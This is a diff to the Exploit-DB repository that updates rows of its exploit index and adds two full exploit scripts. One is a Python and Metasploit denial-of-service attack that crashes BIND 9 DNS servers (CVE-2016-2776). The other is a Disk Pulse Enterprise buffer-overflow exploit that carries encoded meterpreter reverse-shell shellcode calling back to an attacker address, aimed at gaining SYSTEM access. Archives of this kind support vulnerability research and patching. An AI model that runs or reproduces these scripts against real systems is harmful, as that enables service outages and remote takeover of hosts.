 35068,platforms/hardware/remote/35068.txt,"pfSense - pkg_edit.php id Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0
 35069,platforms/hardware/remote/35069.txt,"pfSense - pkg.php xml Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0
 35070,platforms/hardware/remote/35070.txt,"pfSense - status_graph.php if Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0
@ -31696,7 +31696,7 @@ id,file,description,date,author,platform,type,port
 35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0
 35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution",2014-10-27,Vulnerability-Lab,ios,webapps,1861
 35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent Cross-Site Scripting",2014-10-27,Vulnerability-Lab,ios,webapps,0
-35084,platforms/php/webapps/35084.txt,"WordPress Plugin Twitter Feed 'url' Parameter - Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0
+35084,platforms/php/webapps/35084.txt,"WordPress Plugin Twitter Feed - 'url' Parameter Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0
 35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro - 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0
 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0
 35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0
@ -32383,7 +32383,7 @@ id,file,description,date,author,platform,type,port
 35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 - 'colour_picker.php' Cross-Site Scripting",2011-06-06,"Patrick Webster",php,webapps,0
 35833,platforms/php/webapps/35833.txt,"Xataface 1.x - 'action' Parameter Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0
 35834,platforms/php/webapps/35834.txt,"Blog:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0
-35835,platforms/php/webapps/35835.txt,"WordPress Plugin GD Star Rating 'votes' Parameter - SQL Injection",2011-06-08,anonymous,php,webapps,0
+35835,platforms/php/webapps/35835.txt,"WordPress Plugin GD Star Rating - 'votes' Parameter SQL Injection",2011-06-08,anonymous,php,webapps,0
 35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,linux,remote,0
 35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 - 'email' Parameter Cross-Site Scripting",2011-06-07,LiquidWorm,php,webapps,0
 35838,platforms/php/webapps/35838.txt,"Tolinet Agencia - 'id' Parameter SQL Injection",2011-06-10,"Andrea Bocchetti",php,webapps,0
@ -32519,7 +32519,7 @@ id,file,description,date,author,platform,type,port
 35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0
 35965,platforms/php/webapps/35965.txt,"Joomla! Component com_resman - Cross-Site Scripting",2011-07-15,SOLVER,php,webapps,0
 35966,platforms/php/webapps/35966.txt,"Joomla! Component com_newssearch - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
-35967,platforms/php/webapps/35967.txt,"AJ Classifieds 'listingid' Parameter - SQL Injection",2011-07-15,Lazmania61,php,webapps,0
+35967,platforms/php/webapps/35967.txt,"AJ Classifieds - 'listingid' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
 35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injections",2011-07-18,Lazmania61,php,webapps,0
 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0
 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ - Cross-Site Request Forgery / HTML Injection",2011-07-18,MustLive,hardware,remote,0
@ -32589,7 +32589,7 @@ id,file,description,date,author,platform,type,port
 36055,platforms/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection",2015-02-11,Vulnerability-Lab,php,webapps,8080
 36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow (Metasploit)",2015-02-11,Metasploit,windows,remote,9256
 36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Persistent Cross-Site Scripting",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311
-36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0
+36070,platforms/php/dos/36070.txt,"PHP < 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0
 36061,platforms/php/webapps/36061.php,"WordPress Plugin Webdorado Spider Event Calendar 1.4.9 - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0
 36062,platforms/windows/local/36062.txt,"Realtek 11n Wireless LAN utility - Privilege Escalation",2015-02-13,"Humberto Cabrera",windows,local,0
 36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0
@ -32960,7 +32960,7 @@ id,file,description,date,author,platform,type,port
 36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080
 36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443
 36442,platforms/linux/webapps/36442.txt,"Citrix Nitro SDK - Command Injection",2015-03-19,"Han Sahin",linux,webapps,0
-36443,platforms/windows/dos/36443.txt,"Opera Web Browser Prior to 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities",2011-12-12,anonymous,windows,dos,0
+36443,platforms/windows/dos/36443.txt,"Opera Web Browser < 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities",2011-12-12,anonymous,windows,dos,0
 36444,platforms/php/webapps/36444.txt,"WordPress Plugin flash-album-gallery - 'flagshow.php' Cross-Site Scripting",2011-12-13,Am!r,php,webapps,0
 36445,platforms/php/webapps/36445.txt,"WordPress Plugin The Welcomizer 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,php,webapps,0
 36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0
@ -32999,6 +32999,7 @@ id,file,description,date,author,platform,type,port
 36487,platforms/php/webapps/36487.txt,"WordPress Plugin Comment Rating 2.9.20 - 'path' Parameter Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0
 36488,platforms/php/webapps/36488.txt,"WordPress Plugin WHOIS 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0
 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0
 40453,platforms/multiple/dos/40453.py,"Bind 9 DNS Server - Denial of Service",2016-10-04,Infobyte,multiple,dos,53
 36490,platforms/php/webapps/36490.py,"WordPress Plugin WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
 36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
 36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
@ -35874,8 +35875,8 @@ id,file,description,date,author,platform,type,port
 39552,platforms/php/webapps/39552.txt,"WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80
 39553,platforms/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery <= 8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80
 39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80
-39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
+39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
-39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
+39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
 39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow Denial of Service",2016-03-14,INSECT.B,windows,dos,0
 39558,platforms/php/webapps/39558.txt,"WordPress Plugin Site Import 1.0.1 - Local File Inclusion / Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80
 39559,platforms/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",php,webapps,80
@ -35984,7 +35985,7 @@ id,file,description,date,author,platform,type,port
 39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443
 39677,platforms/hardware/webapps/39677.html,"Hikvision Digital Video Recorder - Cross-Site Request Forgery",2016-04-11,LiquidWorm,hardware,webapps,80
 39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80
-39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80
+39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 < 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80
 39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - .'ZIP' File Directory Traversal",2016-04-11,hyp3rlinx,windows,local,0
 39968,platforms/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947
 39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80
@ -36570,3 +36571,4 @@ id,file,description,date,author,platform,type,port
 40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0
 40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0
 40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0
 40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
--- a/platforms/multiple/dos/40453.py
+++ b/platforms/multiple/dos/40453.py
@ -0,0 +1,201 @@
 import socket
 import struct
 TARGET = ('192.168.200.10', 53)
 Q_A = 1
 Q_TSIG = 250
 DNS_MESSAGE_HEADERLEN = 12
 def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512):
    query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01"
    sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1
    tsig_rr = build_tsig_rr(sweet_spot)
    return query_A + tsig_rr
 def int16(n):
    return struct.pack("!H", n)
 def build_tsig_rr(bind_demarshalled_size):
    signature_data = ("\x00\x00\x57\xeb\x80\x14\x01\x2c\x00\x10\xd2\x2b\x32\x13\xb0\x09"
                      "\x46\x34\x21\x39\x58\x62\xf3\xd5\x9c\x8b\x8f\x65\x00\x00\x00\x00")
    tsig_rr_extra_fields = "\x00\xff\x00\x00\x00\x00"
    necessary_bytes  = len(signature_data) + len(tsig_rr_extra_fields)
    necessary_bytes += 2 + 2 # length fields
    # from sizeof(TSIG RR) bytes conforming the TSIG RR
    # bind9 uses sizeof(TSIG RR) - 16 to build its own
    sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)
    tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields
    tsig_data = algo_name + signature_data
    return tsig_hdr + int16(len(tsig_data)) + tsig_data
 def generate_padding(n):
    max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]
    buckets = [1] * len(max_per_bucket)
    min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte
    max_size = sum(max_per_bucket) + len(buckets) + 2
    if not(min_size <= n <= max_size):
        raise RuntimeException("unsupported amount of bytes")
    curr_idx, n = 0, n - min_size
    while n > 0:
        next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)
        buckets[curr_idx] = 1 + n - next_n
        n, curr_idx = next_n, curr_idx + 1
    n_padding = lambda amount: chr(amount) + "A" * amount
    stringify = lambda sizes: "".join(map(n_padding, sizes)) + "\x00"
    return stringify(buckets[:4]), stringify(buckets[4:])
 if __name__ == "__main__":
    bombita = build_bind_nuke()
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(bombita, TARGET)
    s.close()
 '''
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 require 'timeout'
 require 'socket'
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::UDPScanner
  include Msf::Auxiliary::Dos
  include Msf::Auxiliary::Report
  def initialize(info={})
    super(update_info(info,
      'Name'        => 'BIND 9 DoS CVE-2016-2776',
      'Description' => %q{
          Denial of Service Bind 9 DNS Server CVE-2016-2776.
          Critical error condition which can occur when a nameserver is constructing a response.
          A defect in the rendering of messages into packets can cause named to exit with an
          assertion failure in buffer.c while constructing a response to a query that meets certain criteria.
          This assertion can be triggered even if the apparent source address isnt allowed
          to make queries.
      },
      # Research and Original PoC - msf module author
      'Author'      => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'],
      'License'     => MSF_LICENSE,
      'References'      =>
        [
          [ 'CVE', '2016-2776' ],
          [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ]
        ],
      'DisclosureDate' => 'Sep 27 2016',
      'DefaultOptions' => {'ScannerRecvWindow' => 0}
    ))
    register_options([
      Opt::RPORT(53),
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
    ])
    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
  end
  def check_server_status(ip, rport)
    res = ""
    sudp = UDPSocket.new
    sudp.send(valid_query, 0, ip, rport)
    begin
      Timeout.timeout(5) do
      res = sudp.recv(100)
    end
    rescue Timeout::Error
    end
    if(res.length==0)
      print_good("Exploit Success (Maybe, nameserver did not replied)")
      else
        print_error("Exploit Failed")
    end
  end
  def scan_host(ip)
    @flag_success = true
    print_status("Sending bombita (Specially crafted udp packet) to: "+ip)
    scanner_send(payload, ip, rport)
    check_server_status(ip, rport)
  end
  def get_domain
    domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)
    org = "\x03"+Rex::Text.rand_text_alphanumeric(3)
    get_domain = domain+org
  end
  def payload
    query = Rex::Text.rand_text_alphanumeric(2)  # Transaction ID: 0x8f65
    query += "\x00\x00"  # Flags: 0x0000 Standard query
    query += "\x00\x01"  # Questions: 1
    query += "\x00\x00"  # Answer RRs: 0
    query += "\x00\x00"  # Authority RRs: 0
    query += "\x00\x01"  # Additional RRs: 1
    # Doman Name
    query += get_domain   # Random DNS Name
    query += "\x00"      # [End of name]
    query += "\x00\x01"  # Type: A (Host Address) (1)
    query += "\x00\x01"  # Class: IN (0x0001)
    # Aditional records. Name
    query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes
    query += "\x3d"+Rex::Text.rand_text_alphanumeric(61)
    query += "\x00"
    query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
    query += "\x00\xff" # Class: ANY (0x00ff)
    query += "\x00\x00\x00\x00" # Time to live: 0
    query += "\x00\xfc" # Data length: 252
    # Algorithm Name
    query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes
    query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes
    query += "\x00"
    # Rest of TSIG
    query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan  1, 1970 03:15:07.000000000 ART
    query += "\x01\x2c" # Fudge: 300
    query += "\x00\x10" # MAC Size: 16
    query +=  Rex::Text.rand_text_alphanumeric(16) # MAC
    query += "\x8f\x65" # Original Id: 36709
    query += "\x00\x00" # Error: No error (0)
    query += "\x00\x00" # Other len: 0
  end
  def valid_query
    query = Rex::Text.rand_text_alphanumeric(2)  # Transaction ID: 0x8f65
    query += "\x00\x00"  # Flags: 0x0000 Standard query
    query += "\x00\x01"  # Questions: 1
    query += "\x00\x00"  # Answer RRs: 0
    query += "\x00\x00"  # Authority RRs: 0
    query += "\x00\x00"  # Additional RRs: 0
    # Doman Name
    query += get_domain   # Random DNS Name
    query += "\x00"      # [End of name]
    query += "\x00\x01"  # Type: A (Host Address) (1)
    query += "\x00\x01"  # Class: IN (0x0001)s
  end
 end
 '''
--- a/platforms/unix/remote/22442.c
+++ b/platforms/unix/remote/22442.c
--- a/platforms/windows/remote/40452.py
+++ b/platforms/windows/remote/40452.py
@ -0,0 +1,93 @@
 #!/usr/bin/python
 print "Disk Pulse Enterprise 9.0.34 Buffer Overflow Exploit"
 print "Author: Tulpa // tulpa[at]tulpa-security[dot]com"
 #Author website: www.tulpa-security.com
 #Author twitter: @tulpa-security.com
 #Exploit will land you NT AUTHORITY\SYSTEM
 #You do not need to be authenticated, password below is garbage
 #Swop out IP, shellcode and remember to adjust '\x41' for bytes
 #Tested on Windows 7 x86 Enterprise SP1
 #Greetings to ozzie_offsec and carbonated
 #Special Shoutout to unfo- for making me look closer
 import socket
 import sys
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 connect=s.connect(('192.168.123.132',80))
 #bad chars \x00\x0a\x0d\x26
 #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
 #payload size 308
 buf =  ""
 buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
 buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
 buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
 buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
 buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
 buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
 buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
 buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
 buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
 buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
 buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
 buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
 buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
 buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
 buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
 buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
 buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
 buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
 buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
 buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
 buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
 buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
 buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
 buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
 #pop pop ret 1001A333
 nseh = "\x90\x90\xEB\x0B"
 seh = "\x33\xA3\x01\x10"
 egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
 egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
 evil =  "POST /login HTTP/1.1\r\n"
 evil += "Host: 192.168.123.132\r\n"
 evil += "User-Agent: Mozilla/5.0\r\n"
 evil += "Connection: close\r\n"
 evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
 evil += "Accept-Language: en-us,en;q=0.5\r\n"
 evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
 evil += "Keep-Alive: 300\r\n"
 evil += "Proxy-Connection: keep-alive\r\n"
 evil += "Content-Type: application/x-www-form-urlencoded\r\n"
 evil += "Content-Length: 17000\r\n\r\n"
 evil += "username=admin"
 evil += "&password=aaaaa\r\n"
 evil += "\x41" * 12292 #subtract/add for payload
 evil += "w00tw00t"
 evil += "\x90" * 20
 evil += buf
 evil += "\x90" * 50
 evil += "\x42" * 1614
 evil += nseh
 evil += seh
 evil += "\x90" * 20
 evil += egghunter
 evil += "\x90" * 7000
 print 'Sending evil buffer...'
 s.send(evil)
 print 'Payload Sent!'
 s.close()